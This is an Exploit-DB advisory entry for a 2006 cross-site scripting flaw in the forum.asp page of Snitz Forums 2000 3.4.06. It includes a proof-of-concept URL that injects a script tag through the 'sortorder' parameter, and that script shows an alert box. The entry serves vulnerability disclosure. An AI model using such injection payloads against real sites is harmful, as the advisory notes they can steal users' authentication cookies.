Snitz Forums 2000 - 'forum.asp' Cross-Site Scripting

EDB-ID:

28566


Author:

ajann

Type:

webapps


Platform:

ASP

Date:

2006-09-13


source: https://www.securityfocus.com/bid/20004/info

Snitz Forums 2000 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

This could allow an attacker to steal cookie-based authentication credentials and launch other attacks.

Version 3.4.06 is vulnerable; other versions may also be affected.

http://www.example.com/[path]/forum.asp?FORUM_ID=1&ARCHIVE=true&sortfield=lastpost&sortorder="><script>function%20xssbaslat(){alert("Xss%20Here");}</script><body%20onload="xssbaslat()"> etc..